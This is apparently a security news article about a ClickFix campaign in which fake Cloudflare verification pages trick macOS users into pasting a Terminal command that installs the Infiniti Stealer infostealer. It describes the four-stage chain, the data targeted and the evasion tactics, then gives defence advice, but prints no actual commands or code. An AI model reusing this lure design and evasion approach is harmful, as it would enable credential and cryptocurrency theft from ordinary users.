Security researchers have identified a new ClickFix campaign that impersonates Cloudflare's browser verification interface to deliver the Infiniti Stealer — a Python-based infostealer — to macOS users. The attack chain is notable for its four-stage delivery pipeline and its specific targeting of Apple hardware users.
What Is ClickFix
ClickFix is a social engineering technique in which attackers present victims with fake error messages or CAPTCHA prompts that instruct users to manually copy and execute a command in their terminal or browser console. By leveraging the victim's own actions, the attack bypasses many automated security controls that would catch a traditional drive-by download.
The technique has been widely adopted by threat actors over the past year, applied across a range of lures including fake browser error pages, fake document viewers, and — in this latest campaign — Cloudflare's trusted browser integrity check UI.
The Cloudflare Impersonation Lure
Attackers in this campaign create convincing replicas of Cloudflare's "Checking your browser" / "Verify you are human" pages — the familiar interstitial page that Cloudflare displays before granting access to protected websites.
Victims arrive at these pages via malicious links distributed through phishing emails, compromised websites, or ad networks. The fake Cloudflare page instructs the user to complete a "manual verification step" by opening their Mac terminal and pasting a command. This is the ClickFix trigger.
Four-Stage Infection Chain
Stage 1: Fake Cloudflare CAPTCHA Page
The victim lands on a convincing Cloudflare-branded verification page. Unlike a real Cloudflare challenge (which completes automatically), this page instructs the user to open Terminal and paste a clipboard-injected command. The page automatically copies the malicious command to the clipboard when the user clicks the provided button.
Stage 2: Bash Script
The pasted command downloads and executes a Bash script from an attacker-controlled server. The script performs environment checks — verifying the target is macOS, that it isn't running in a sandbox, and gathering basic system information before proceeding to the next stage. If the environment check fails, the script exits silently to avoid detection.
Stage 3: Nuitka-Compiled Loader
The Bash script drops a Nuitka-compiled binary. Nuitka is a legitimate Python-to-C compiler that converts Python code into standalone native executables. By compiling with Nuitka, attackers produce a binary that avoids Python script detection and is harder to statically analyze than plain .py files. The loader decrypts and executes the final payload.
Stage 4: Infiniti Stealer
The payload is Infiniti Stealer — a Python-based infostealer targeting macOS. Infiniti Stealer is designed to harvest:
- macOS Keychain credentials — system-stored passwords, Wi-Fi keys, and application credentials
- Browser data — saved passwords, cookies, and session tokens from Safari, Chrome, and Firefox
- Cryptocurrency wallet data — seed phrases and wallet files from popular software wallets
- System information — hardware identifiers, installed applications, and user account details
Stolen data is exfiltrated to attacker-controlled infrastructure. The stealer attempts to operate without triggering macOS System Integrity Protection (SIP) or Transparency, Consent, and Control (TCC) prompts by limiting its access to user-readable data stores rather than requesting elevated permissions.
macOS as a Growing Target
This campaign is part of a broader trend of infostealer campaigns pivoting toward macOS. Historically, infostealers primarily targeted Windows environments. However, the increasing prevalence of Macs in corporate environments — particularly in development, finance, and executive roles — has made macOS a lucrative target.
Cloudflare is a particularly effective impersonation lure because:
- It is one of the most recognized security brands
- Its browser verification pages appear on millions of websites daily
- Users have been conditioned to interact with Cloudflare challenges rather than question them
Detection & Defence
For end users (macOS):
- Never paste commands into Terminal from a webpage, regardless of how legitimate the page appears
- Cloudflare's real browser verification never requires terminal commands — it completes automatically in the browser
- Keep macOS and applications updated to benefit from the latest XProtect signatures
For security teams:
- Deploy endpoint detection capable of identifying Nuitka-compiled binaries and unusual Python execution patterns on macOS
- Monitor for outbound connections to recently registered or uncommon domains following user web browsing
- Block execution of unsigned binaries downloaded from the internet where policy permits
- Train users specifically on ClickFix social engineering — the manual terminal step is the clearest red flag
Source: SecurityWeek